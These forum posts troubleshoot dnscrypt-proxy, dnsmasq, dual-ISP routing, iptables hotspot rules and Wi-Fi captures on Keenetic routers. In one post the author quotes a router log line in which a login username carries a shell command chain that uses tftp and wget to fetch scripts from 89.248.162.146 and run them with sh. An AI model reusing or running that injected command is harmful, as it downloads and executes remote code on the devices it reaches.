Jump to content

vasek00

Forum Members
  • Posts

    4,392
  • Joined

  • Last visited

  • Days Won

    75

Posts posted by vasek00

  1. Не большой тест на примере двух resolv и двух каналах при применении dnscrypt при сравнении работы на одном канале и с одним resolv на cisco и близко не было к такому результату.

    Скрины с клиента в локальной сети роутера и с установленном на нем IP DNS -роутера.

    Bench-1.jpg

    Bench.jpg

    • Upvote 1
  2. При первом приближение все работает на два канала при

    Скрытый текст

    dnsmasq.conf

    ...

    server=127.0.0.2#65053
    server=127.0.0.2#65153
    all-servers


    dnscrypt-proxy

    dnscrypt-proxy --local-address=127.0.0.2:65053 --daemonize –edns-payload-size=1252 -R cisco \

    -l /opt/tmp/dnscrypt-proxy.65053.log -m 7 --plugin=libdcplugin_example_ldns_blocking.so,--ips=/opt/tmp/blk-ips,--domains=/opt/tmp/blk-names

    dnscrypt-proxy --local-address=127.0.0.2:65153 --daemonize –edns-payload-size=1252 -R dnscrypt.eu-dk \

    -l /opt/tmp/dnscrypt-proxy.65153.log -m 7 --plugin=libdcplugin_example_ldns_blocking.so,--ips=/opt/tmp/blk-ips,--domains=/opt/tmp/blk-names

     

    плюс :

    1. стат. маршрут на dnscrypt.eu-dk через WEB для host - 77.66.84.233

    2. в итоге два канала и маршрут, где провайдер1 ppp0 один приоритет 1000 и ppp1 провайдер2 приоритет 800, в данном случае основной ppp0 резервный ppp1

    /opt/etc/init.d # ip ro
    default dev ppp0  scope link
    77.66.84.233 dev ppp1  scope link
    ...

    IP_prov_II dev ppp1  scope link
    ...

    /opt/etc/init.d #

    По dnsmasq запросы имеют такой вид

    Aug 19 14:12:01 dnsmasq[2088]: query[A] wendang.baidu.com from 192.168.1.2
    Aug 19 14:12:01 dnsmasq[2088]: forwarded wendang.baidu.com to 127.0.0.2
    Aug 19 14:12:01 dnsmasq[2088]: forwarded wendang.baidu.com to 127.0.0.2
    Aug 19 14:12:01 dnsmasq[2088]: query[A] incoming.telemetry.mozilla.org from 192.168.1.2
    Aug 19 14:12:01 dnsmasq[2088]: forwarded incoming.telemetry.mozilla.org to 127.0.0.2
    Aug 19 14:12:01 dnsmasq[2088]: forwarded incoming.telemetry.mozilla.org to 127.0.0.2

    По dnscrypt-proxy логу

    65053.log

    ...

    Sat Aug 19 14:55:30 2017    127.0.0.1    forum.keenetic.net    A
    Sat Aug 19 14:55:30 2017    127.0.0.1    r270260.tryinvision.com    A
    Sat Aug 19 14:55:37 2017    127.0.0.1    app-measurement.com    A
    Sat Aug 19 14:56:04 2017    127.0.0.1    incoming.telemetry.mozilla.org    A

    65153.log

    ...

    Sat Aug 19 14:55:30 2017    127.0.0.1    forum.keenetic.net    A
    Sat Aug 19 14:55:30 2017    127.0.0.1    r270260.tryinvision.com    A
    Sat Aug 19 14:55:37 2017    127.0.0.1    app-measurement.com    A
    Sat Aug 19 14:56:04 2017    127.0.0.1    incoming.telemetry.mozilla.org    A

    В данном случае все запросы для dnscrypt-proxy идут от dnsmasq

    В итоге, запрос от клиента локальной сети попадает на роутер  c него уходят запросы сразу же на два resolv - cisco и dnscrypt.eu-dk и два есть прихода ответов на эти запросы, очередность запросов всегда одна а вот очередность прихода ответов на эти запросы бывают разные (т.е. то с одного канала первым приходит, то со второго канала приходит)

  3. На релизе dnscrypt-proxy 1.9.5 есть возможность использовать списки блокировки используя plugins

    Скрытый текст

    /opt/lib/dnscrypt-proxy # ls -l
    -rwxr-xr-x    1 root     root          8408 Jun 13 15:54 libdcplugin_example_cache.so
    -rwxr-xr-x    1 root     root          4052 Jun 13 15:54 libdcplugin_example_ldns_aaaa_blocking.so
    -rwxr-xr-x    1 root     root         16640 Jun 13 15:54 libdcplugin_example_ldns_blocking.so
    -rwxr-xr-x    1 root     root          8368 Jun 13 15:54 libdcplugin_example_ldns_forwarding.so
    -rwxr-xr-x    1 root     root          5836 Jun 13 15:54 libdcplugin_example_ldns_opendns_deviceid.so
    -rwxr-xr-x    1 root     root          5568 Jun 13 15:54 libdcplugin_example_ldns_opendns_set_client_ip.so
    -rwxr-xr-x    1 root     root          7228 Jun 13 15:54 libdcplugin_example_logging.so
    /opt/lib/dnscrypt-proxy #

    например строка запуска

    ARGS="--local-address=127.0.0.2:65053 --daemonize –edns-payload-size=1252 -R cisco -l /opt/tmp/dnscrypt-proxy.65053.log -m 7 \

    --plugin=libdcplugin_example_ldns_blocking.so,--ips=/opt/tmp/blk-ips,--domains=/opt/tmp/blk-names"

    где в файлах /opt/tmp/blk-names и /opt/tmp/blk-ips естественно лежат имена и адреса нужных для блокировки в формате - адреса IPv4 и IPv6, а для имен групповые символы (*) пример *xxx**.example.comads.*

    простой пример блокировки youtube.com -> в файле /opt/tmp/blk-names прописать youtube.com

    Можно использовать как альтернативу в место dnsmasq

    addn-hosts=/opt/tmp/hosts0
    addn-hosts=/opt/tmp/malwaredom_block.host
    addn-hosts=/opt/tmp/mvps_block.host

    Другие примеры:

    # dnscrypt-proxy --plugin=libdcplugin_example_ldns_opendns_set_client_ip.so,192.30.252.130

    # dnscrypt-proxy --plugin=libdcplugin_example_ldns_opendns_deviceid.so,/opt/etc/umbrella-password.txt

     

    так же возможен вариант например использовать не один а два резолва:

    ARGS1="--local-address=127.0.0.2:65053 --daemonize .... -R cisco -l /opt/tmp/dnscrypt-proxy.65053.log -m 7 ...."
    ARGS2="--local-address=127.0.0.2:65153 --daemonize .... -R ns0.dnscrypt.is -l /opt/tmp/dnscrypt-proxy.65153.log -m 7 ...."

    тогда в dnsmasq конфиге

    server=127.0.0.2#65053
    server=127.0.0.2#65153

    А если добавить в конфиг строчку all-servers то можно получить одновременно запрос на все сервера которые имеются в строчках server (порождает чуток избыточный трайик, но по моему у кого безлим не принципиально). А если еще и два канала то запросы можно развернуть один на один канал, другой на другой (хоть он например и в резерве весит) информация по IP для маршрута можно взять из файла dnscrypt-resolvers-conf ищется нужная запись и на против нее поиск Ip адреса или любым приложением которое есть в opkg или в системе.

  4. Релиз 2.10

    Проверьте еще раз настройку (можно конфиг посмотреть для достоверности, а то может WEB что-то начудил, при не однократной настройке), отключите pingchek.

    Должно все работать.

    Скрытый текст

    / # ip ro
    default dev ppp1  scope link
    ...
    хх.хх.хх.1 dev ppp0  proto kernel  scope link  src хх.хх.хх.172
    yy.yy.yy.3 via yy.yy.yy.1 dev eth2.4
    yy.yy.yy.0/19 dev eth2.4  proto kernel  scope link  src yy.yy.yy.2
    192.168.1.0/24 dev br0  proto kernel  scope link  src 192.168.1.100
    ...

    yy.yy.yy.26 dev ppp1  proto kernel  scope link  src yy.yy.yy.2
    / #

    Меняю канал

    / # ip ro
    default dev ppp0  scope link
    ....

    yy.yy.yy.26 dev ppp1  proto kernel  scope link  src yy.yy.yy.2
    / #

     

    Без имени-2.jpg

    Для системы по барабану основной или резервный - только default маршрут, а вот переключение его и что считать основным и резервным это уже доп.функция основанная на приоритете интерфейса и доступности другой стороны на нем.

    • Upvote 1
  5. Словил ошибку, все больше склоняюсь что все таки на роутере что-то забывает соединения, после продолжительного времени без действия клиента (не пользованием браузером минут 40) вчера сменил cisco на dnscrypt-proxy --local-address=127.0.0.2:65053 --daemonize dns-payload-size=1252 -R cypherpunks.ru

    dnscrypt-proxy
    
    Tue Aug 15 10:23:57 2017 [INFO] Server key fingerprint is CC02:411D:EA4B:F44D:0E5F:7A18:957B:E8DD:F059:C259:B504:473E:4453:F3BB:CB95:8203
    Tue Aug 15 11:23:59 2017 [INFO] Refetching server certificates
    Tue Aug 15 11:23:59 2017 [INFO] Server certificate with serial #1493333335 received
    Tue Aug 15 11:23:59 2017 [INFO] This certificate is valid
    Tue Aug 15 11:23:59 2017 [INFO] Chosen certificate #14933333335 is valid from [2017-05-26] to [2018-05-26]
    Tue Aug 15 11:23:59 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy.
    Tue Aug 15 11:23:59 2017 [INFO] Server key fingerprint is CC02:411D:EA4B:F44D:0E5F:7A18:957B:E8DD:F059:C259:B504:473E:4453:F3BB:CB95:8203
    Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP)
    Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP)
    Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP)
    Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP)
    Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP)
    Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP)
    Tue Aug 15 11:51:21 2017 [DEBUG] resolver timeout (UDP)
    
    По Dnsmasq
    
    Aug 15 11:50:24 dnsmasq[789]: query[A] dns.msftncsi.com from 192.168.130.2
    Aug 15 11:50:24 dnsmasq[789]: forwarded dns.msftncsi.com to 127.0.0.2
    ...
    Aug 15 11:50:26 dnsmasq[789]: query[A] avatars.mds.yandex.net from 192.168.130.2
    Aug 15 11:50:26 dnsmasq[789]: forwarded avatars.mds.yandex.net to 127.0.0.2
    Aug 15 11:50:26 dnsmasq[789]: query[A] yastatic.net from 192.168.130.2
    Aug 15 11:50:26 dnsmasq[789]: forwarded yastatic.net to 127.0.0.2
    ...
    Aug 15 11:50:30 dnsmasq[789]: query[A] forum.keenetic.net from 192.168.130.2
    Aug 15 11:50:30 dnsmasq[789]: forwarded forum.keenetic.net to 127.0.0.2
    Aug 15 11:50:30 dnsmasq[789]: query[A] forum.keenetic.net from 192.168.130.2
    Aug 15 11:50:30 dnsmasq[789]: forwarded forum.keenetic.net to 127.0.0.2

    сегодня в 11:50 попытка просмотреть страницу которая открылась спустя наверное 1-1,5минуту после повторного нажатия открытия.

    Дерганье netfilter.d
    
    Tue Aug 15 11:14:46 MSK 2017
    track --- tables = filter
    Tue Aug 15 11:57:07 MSK 2017
    track --- tables = filter
    
    Log роутера
    Aug 15 11:14:46ndm kernel: IPv4 conntrack lan: flushed 1 entries with address 192.168.130.19
    Aug 15 11:14:46ndm kernel: SWNAT bind table cleared
    Aug 15 11:57:07ndm kernel: SWNAT bind table cleared

     

  6. Проверьте конфиг в ручную, на какие строчки обратить внимание у вас было раньше в WEB - /#security.acl (или он же Межсетевой экран)

    Скрытый текст

    конфиг файл строчки

    access-list _WEBADMIN_Home
        permit tcp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 port eq 80
        permit tcp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 port eq 443

    ...

    правила разрешающие проход из "Home" куда угодно для 80/443 или их результат можно найти iptables -nvL в "Chain @Home"

    Скрытый текст

    Chain @Home (1 references)
     pkts bytes target     prot opt in     out     source               destination         
        0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            tcp spt:80
        0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            tcp spt:443

    при запрете через WEB - /#home.hosts для данного клиента в конфиге получите запись

    Скрытый текст

    конфиг файл строчки

    ip hotspot
        host хх:хх:хх:хх:хх:24 deny

    или по iptables получите в "Chain _NDM_HOTSPOT_FWD" правило на DROP для данного клиента. Но если у вас в конфиге есть правила из security.acl то запрет в home.hosts не поможет из-за того что написано выше про 80/443 порты.

    В данном случае просто посмотрите свой конфиг.

     

     

     

  7. Скрытый текст

    dnscrypt-proxy

    Thu Aug 10 15:41:19 2017 [DEBUG] resolver timeout (UDP)
    Thu Aug 10 15:59:33 2017 [INFO] Refetching server certificates

    ....

    Fri Aug 11 14:06:18 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
    Fri Aug 11 14:09:58 2017 [DEBUG] resolver timeout (UDP)
    Fri Aug 11 14:10:07 2017 [DEBUG] resolver timeout (UDP)
    Fri Aug 11 14:10:13 2017 [DEBUG] resolver timeout (UDP)
    Fri Aug 11 15:07:41 2017 [INFO] Refetching server certificates

    ...

    Sun Aug 13 09:38:33 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778

    За Aug 11 всего один раз, за Aug 12 не разу.

  8. 16 минут назад, edm сказал:

    подтверждаю, через веб-интерфейс сделал сброс.

    вникнуть в дело конфигов особого желания нет: разобраться, что какая переменная за что работает, по какому алгоритму работает и т.д.

    Всё должно работать из коробки. 

    Вы уверены что все должно работать из коробки, далеко ходить не надо берем пример с Windows у которой каждый месяц выходят дополнения и обновления, второе не мало важное где вы виделе чтоб в коробке стояло 2.10.х.х.х-х?

    По поводу - желания нет: разобраться время сейчас такое, что даже для настройки цифрового ТВ нужны кой какие знания, а уж про смарт телефон молчу.

  9. 12 часа назад, edm сказал:

    почему тогда при - 4. сделал сброс настроек.

    всё еще - 5. проверил запрет доступа в интернет. Всё еще не блокирует.

    ?

    Первое вы уверены что сделали - сброс настроек, не на словах что нажали кнопку сброс к заводским или через WEB? Второе можно было проверить - конфиг что в нем и как.

  10.  

    12 часа назад, edm сказал:

    6. установил специально firmware_mini (т.е. там только компоненты "Интерфейкс Wi-Fi", "Интерфейс USB", 3 компонента из Mods, "Ограничения скорости интернета", "Общий доступ к файлам и принтенам", "Интернет фильтр Яндекс.DNS", "FTP-сервер", "Поддержка USB-накопителей", "Контроль доступа к папкам" и "Поддержка открытых пакетов".

    7. проверил запрет доступа в интернет. О! блокирует.

    Вам надо проанализировать и сравнить файлы startup-config_mini.txt и startup-config.txt. И понять, в чем дело.

    Есть несколько типов роутеров - на всех стоят полные компоненты, того что у вас не замечал, конфиг файл нужно было проверить на наличие переменных те про которые написаны выше.

  11. 31 минуту назад, edm сказал:

    не понимаю как им пользоваться. я ее знаток в линуксе.  

    При настройках через "ip hotspot" и "ip dhcp host клиент" (через WEB роутера так же) получаем

    Скрытый текст

    known host PS3 хх:хх:хх:хх:хх:d9

    ip dhcp host хх:хх:хх:хх:хх:d9 192.168.1.21

    ip hotspot
    ...

       host хх:хх:хх:хх:хх:d9 deny
        default-policy deny

    и так же созданные правила, так как клиент локальный то "Chain FORWARD"->"Chain _NDM_FORWARD"->"Chain _NDM_HOTSPOT_FWD" в итоге пакетики для данного клиента который выше описан в "hotspot" пападут в "Chain _NDM_HOTSPOT_FWD" под критерий DROP

    Скрытый текст

    Chain _NDM_HOTSPOT_FWD (1 references)
     pkts bytes target     prot opt in     out     source               destination         
    ...

      147  8836 DROP       all  --  br0    *       192.168.1.21       0.0.0.0/0 

    ...

    другие же клиенты попадут в "Chain _NDM_HOTSPOT_FWD" под критерий RETURN (выход без обработки или "разрешен" выход в интернет).

    pkts - кол-во пакетов, target - цель, prot - протокол, in - вход, out - выход, source - источник, destination - получатель.

    Чем больше клиент пытается как бы выйти в интернет тем больше растет число "заблокированных" пакетов, если данному клиенту дать "разрешение" выхода в интернет то данное правило для него измениться

    Скрытый текст

    Chain _NDM_HOTSPOT_FWD (1 references)
     pkts bytes target     prot opt in     out     source               destination         
       ...
       32  3254 RETURN     all  --  br0    *       192.168.1.21       0.0.0.0/0           
        0     0 RETURN     all  --  *      br0     0.0.0.0/0            192.168.1.21

    ...

    Почему два - по тому что в обе стороны "src -> dst", br0 - основной интерфейс роутера, он же в понимание Zyxel конфига :

    Скрытый текст

    interface Bridge0
        rename Home
        description "Home VLAN"
        inherit FastEthernet0/Vlan1
        include AccessPoint
        security-level private
        ip address 192.168.1.100 255.255.255.0

     

  12. Сеть работает, потом перестает работать и в делает вход клиентом на ПК с одновременным анализом wi-fi (тогда будет видно что и кто пытается из них БС или клиент ПК зарегистрироваться)

  13. Скрытый текст

    Sat Aug  5 14:18:35 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5

    ...

    Sun Aug  6 12:42:21 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
    Sun Aug  6 13:16:38 2017 [NOTICE] Stopping proxy
    Sun Aug  6 13:16:38 2017 [INFO] UDP listener shut down
    Sun Aug  6 13:16:38 2017 [INFO] TCP listener shut down
    Sun Aug  6 13:17:39 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
    Sun Aug  6 13:17:40 2017 [INFO] Generating a new session key pair

    ...

    Sun Aug  6 13:17:40 2017 [NOTICE] Proxying from 127.0.0.2:65053 to 208.67.220.220:443
    Sun Aug  6 13:55:42 2017 [NOTICE] Stopping proxy
    Sun Aug  6 13:55:42 2017 [INFO] UDP listener shut down
    Sun Aug  6 13:55:42 2017 [INFO] TCP listener shut down
    Sun Aug  6 13:56:49 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
    Sun Aug  6 13:56:49 2017 [INFO] Generating a new session key pair
    Sun Aug  6 13:56:49 2017 [INFO] Done

    ... все хорошо до

    Mon Aug  7 09:10:04 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
    Mon Aug  7 09:28:26 2017 [DEBUG] resolver timeout (UDP)
    Mon Aug  7 09:28:29 2017 [DEBUG] resolver timeout (UDP)
    Mon Aug  7 10:11:14 2017 [INFO] Refetching server certificates

    ... опять хорошо до

    Wed Aug  9 07:49:20 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
    Wed Aug  9 08:39:53 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 08:39:54 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 08:39:55 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 08:39:57 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 08:40:01 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 08:40:06 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 08:41:34 2017 [NOTICE] Stopping proxy
    Wed Aug  9 08:41:34 2017 [INFO] UDP listener shut down
    Wed Aug  9 08:41:34 2017 [INFO] TCP listener shut down
    Wed Aug  9 08:42:37 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
    Wed Aug  9 08:42:37 2017 [INFO] Generating a new session key pair
    Wed Aug  9 08:42:37 2017 [INFO] Done

    ... хорошо до

    Wed Aug  9 16:49:03 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
    Wed Aug  9 17:46:57 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:46:57 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:46:58 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:46:58 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:46:59 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:46:59 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:48:21 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:49:06 2017 [INFO] Refetching server certificates
    Wed Aug  9 17:49:06 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:49:06 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:49:07 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:49:07 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:49:07 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:49:09 2017 [DEBUG] resolver timeout (UDP)
    Wed Aug  9 17:49:11 2017 [INFO] Server certificate with serial #1493333338 received
    Wed Aug  9 17:49:11 2017 [INFO] This certificate is valid

    ...

    ... хорошо до сегодня 100817 12:00

    Смотрю дальше, проблем пока не видно, если не смотреть данный лог от dnscrypt-proxy то все ОК. Сервер пока один cisco протокл UDP.

    • Thanks 1
  14. 1 час назад, Dhampir113 сказал:

    а он есть в захвате gn 20/40

    вообще ничего не трогал кроме wifi  модема после сброса, где это крутить?

    в том то и дело, что я уже склоняюсь к тому чтобы в настройках wifi поставить стандарт 802.11bg (на нем все работает) и закрыть эту тему, так как найти что там происходит с 802.11n нашими усилиями практически нереально

    Давайте уточним - в момент отвала если он был в gn-2040 БС не пропадала она вещала, что жива и здорова - ManagementBeacon на [*BROADCAST], второе если не вникать в "HTTP:Response, HTTP/1.1, Status: Ok, URL: /rootDesc.xml" то считаем что идет обмен от БС для данного клиента просто в наличие пакетов => сеть wi-fi работает с данным клиентом (13:14-13:25 на всем этапе захвата).

    Но в данном интервале не понятно с 192.168.1.46 как то странно ведет себя и очень часто сыпит :

    Скрытый текст

    487    13:15:28 07.08.2017    41.7521473    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:Response, HTTP/1.1, Status: Ok, URL: /WSD/DEVICE     {HTTP:108, TCP:107, IPv4:75}

    488    13:15:28 07.08.2017    41.7531128    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:Response, HTTP/1.1, Status: Ok, URL: /WDP/PRINT     {HTTP:101, TCP:98, IPv4:75}

    489    13:15:28 07.08.2017    41.7531128    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:HTTP Payload, URL: /WSD/DEVICE     {HTTP:108, TCP:107, IPv4:75}

    490    13:15:28 07.08.2017    41.7531128    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:HTTP Payload, URL: /WDP/PRINT     {HTTP:101, TCP:98, IPv4:75}

    507    13:15:28 07.08.2017    41.7876346    Unavailable    192.168.1.62    192.168.1.46    HTTP    HTTP:HTTP Payload, URL: /WDP/SCAN     {HTTP:112, TCP:111, IPv4:75}

    ....

    710    13:15:31 07.08.2017    44.9170639    System    192.168.1.62    192.168.1.46    HTTP    HTTP:Response, HTTP/1.1, Status: Accepted, URL: /8a10a700-f4f6-4b22-9312-972a8d010e74     {HTTP:117, TCP:116, IPv4:75}

    последнее по времени и потом только "проснулся" через 7мин, если только вы его не разбудили каким либо действием.

    2875    13:22:58 07.08.2017    491.2953328    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:Response, HTTP/1.1, Status: Ok, URL: /WDP/PRINT     {HTTP:491, TCP:490, IPv4:75}

    ...

    и опять он в процессе

    2948    13:22:59 07.08.2017    492.5273629    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:HTTP Payload, URL: /WDP/SCAN     {HTTP:496, TCP:495, IPv4:75}

    2950    13:22:59 07.08.2017    492.5273629    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:HTTP Payload, URL: /WDP/SCAN     {HTTP:496, TCP:495, IPv4:75}

    2951    13:22:59 07.08.2017    492.5273629    Unavailable    192.168.1.46    192.168.1.62    HTTP    HTTP:HTTP Payload, URL: /WDP/SCAN     {HTTP:496, TCP:495, IPv4:75}

    На счет аренды в 2минуты даже не скажу потому что это

    Скрытый текст

    3505    13:24:39 07.08.2017    592.3401842        0.0.0.0    255.255.255.255    IPv4    IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 281, Total IP Length = 72    {IPv4:194}

      Frame: Number = 3505, Captured Frame Length = 136, MediaType = WiFi
    - WiFi: [Unencrypted Data] F.....P, (I) RSSI = -32 dBm, Rate = 6.0 Mbps
      + MetaData: RSSI = -32 dBm, Rate = 6.0 Mbps
      + FrameControl: Version 0,Data, Data, F.....P(0x4208)
        Duration: 0 (0x0)
        DA: *BROADCAST
        BSSID: EC43F6 007BB8
        SA: 94DE80 4D418C

      + SequenceControl: Sequence Number = 427
    + LLC: Unnumbered(U) Frame, Command Frame, SSAP = SNAP(Sub-Network Access Protocol), DSAP = SNAP(Sub-Network Access Protocol)
    + Snap: EtherType = Internet IP (IPv4), OrgCode = XEROX CORPORATION
    + Ipv4: Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 281, Total IP Length = 72

    если бы для всех то и сам бы 192.168.1.62 терял бы ее или анализатор не правильно распознал.

    Берете одного клиента и только - гоняете его по wi-fi потом другого.

  15. Мне вот интересно какое отношение ко всему этому имеет

    [E] Aug  9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh".

    скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)

     

  16. 22 часа назад, Dhampir113 сказал:

    сделал: фиксирован канал (7), сеть не грузил, клиенты постарался отдалить от снимающего компа:

    -bgn 20 bgn-7-20.cap

    -bgn 20/40 bgn-7-2040.cap

    -gn 20 gn-7-20.cap

    -gn 20/40 gn-7-2040.cap

    недоступность (отвал) соединения по вафле была во всех этих режимах, сейчас работает на 802.11 bg без проблем

    Нужно было еще снять когда произошел отвал.

    1. в данных файлах нет не чего такого серьезного - БС вещает и жива.

    2. есть проблемы на ...1.70 - PARENTS-PS 94:DE:20 .....  выражается это в том что потеря связи и очень часто, во всех файлах для ...1.70 PARENTS-PS.

    Скрытый текст

    960    13:16:15 07.08.2017    88.6139787        192.168.1.62    PARENTS-PC    ICMP    ICMP:Destination Unreachable Message, Port Unreachable, 192.168.1.62:51276    {IPv4:21}

    961    13:16:15 07.08.2017    88.6140452        FE80:0:0:0:7CA8:A5DA:476:17D4    PARENTS-PC    ICMPv6    ICMPv6:Destination unreachable    {IPv6:23}

    980    13:16:18 07.08.2017    91.9552922        FE80:0:0:0:7CA8:A5DA:476:17D4    PARENTS-PC    ICMPv6    ICMPv6:Destination unreachable    {IPv6:23}

    981    13:16:18 07.08.2017    91.9559877        192.168.1.62    PARENTS-PC    ICMP    ICMP:Echo Request Message, From 192.168.1.62 To 192.168.1.70    {IPv4:21}

    1079    13:16:39 07.08.2017    112.3690895        0.0.0.0    255.255.255.255    IPv4    IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 277, Total IP Length = 72    {IPv4:194}

    это пакет для DA: *BROADCAST - BSSID: EC43F6 007BB8 - SA: 94DE80 4D418C (это PARENTS-PC)

    1131    13:16:50 07.08.2017    123.2453407        PARENTS-PC    192.168.1.62    ARP    ARP:Request, 192.168.1.70 asks for 192.168.1.62    

    1132    13:16:50 07.08.2017    123.2454540        192.168.1.62    PARENTS-PC    ARP    ARP:Response, 192.168.1.62 at 84-A6-C8-57-37-5D    

    1133    13:16:50 07.08.2017    123.2455423        PARENTS-PC    FE80:0:0:0:7CA8:A5DA:476:17D4    ICMPv6    ICMPv6:Neighbor Solicitation, Target = FE80:0:0:0:7CA8:A5DA:476:17D4    {IPv6:23}

    1136    13:16:50 07.08.2017    123.7323927        192.168.1.62    PARENTS-PC    ICMP    ICMP:Echo Request Message, From 192.168.1.62 To 192.168.1.70    {IPv4:21}

    1137    13:16:51 07.08.2017    124.1456526        192.168.1.1    PARENTS-PC    ARP    ARP:Request, 192.168.1.1 asks for 192.168.1.70    

    1141    13:16:52 07.08.2017    125.7840868        [EC43F6 007BB8]    [*BROADCAST]    WiFi    WiFi:[ ManagementBeacon] ....... RSSI = -28 dBm, Rate = 1.0 Mbps, SSID = AstMedia, Channel = 7    

    ...

    1654    13:18:39 07.08.2017    232.3878075        0.0.0.0    255.255.255.255    IPv4    IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 278, Total IP Length = 72    {IPv4:194}

    ...

    2229    13:20:39 07.08.2017    352.4059381        0.0.0.0    255.255.255.255    IPv4    IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 279, Total IP Length = 72    {IPv4:194}

    ...

    2771    13:22:38 07.08.2017    471.7071110        [EC43F6 007BB8]    [*BROADCAST]    WiFi    WiFi:[ ManagementBeacon] ....... RSSI = -31 dBm, Rate = 1.0 Mbps, SSID = AstMedia, Channel = 7    

    2772    13:22:39 07.08.2017    472.4241918        0.0.0.0    255.255.255.255    IPv4    IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 280, Total IP Length = 72    {IPv4:194}

    ...

    3504    13:24:38 07.08.2017    591.6668933        FE80:0:0:0:7CA8:A5DA:476:17D4    PARENTS-PC    TCP    TCP:[SynReTransmit #3430]Flags=......S., SrcPort=51532, DstPort=Microsoft-DS(445), PayloadLen=0, Seq=3908574738, Ack=0, Win=64800 ( Negotiating scale factor 0x8 ) = 64800    {TCP:578, IPv6:23}

    3505    13:24:39 07.08.2017    592.3401842        0.0.0.0    255.255.255.255    IPv4    IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 281, Total IP Length = 72    {IPv4:194}

    Это так задумано интервал аренды 2минуты для PARENTS-PC или что-то с настройками у него.

  17. За сутки с небольшим - анализ работы на много лучше чем было ранее (ощущение по отзывчивости). Так проверял в основном udp работу при конфиге ниже :

    Скрытый текст

    DNSmasq

    no-resolv
    interface=br0
    bind-interfaces
    listen-address=192.168.1.100
    #except-interface=lo
    server=127.0.0.2#60053
    addn-hosts=/opt/tmp/hosts0
    addn-hosts=/opt/tmp/malwaredom_block.host
    addn-hosts=/opt/tmp/mvps_block.host
    cache-size=150 и так же с cache-size=0
    log-queries
    log-facility=/opt/var/log/dnsmasq.log
    log-async=25

     

    dnscrypt-proxy --local-address=127.0.0.2:65053 --daemonize –edns-payload-size=1252 -R cisco -l /opt/tmp/dnscrypt-proxy.60053.log -m 7

    -m --loglevel=<level>: don't log events with priority above this level after the service has been started up. Default is 6, the value for LOG_INFO. Valid values are 0 (system is unusable), 1 (action must be taken immediately), 2 (critical conditions), 3 (error conditions), 4 (warning conditions), 5 (normal but significant condition), 6 (informational) and 7 (debug-level messages).

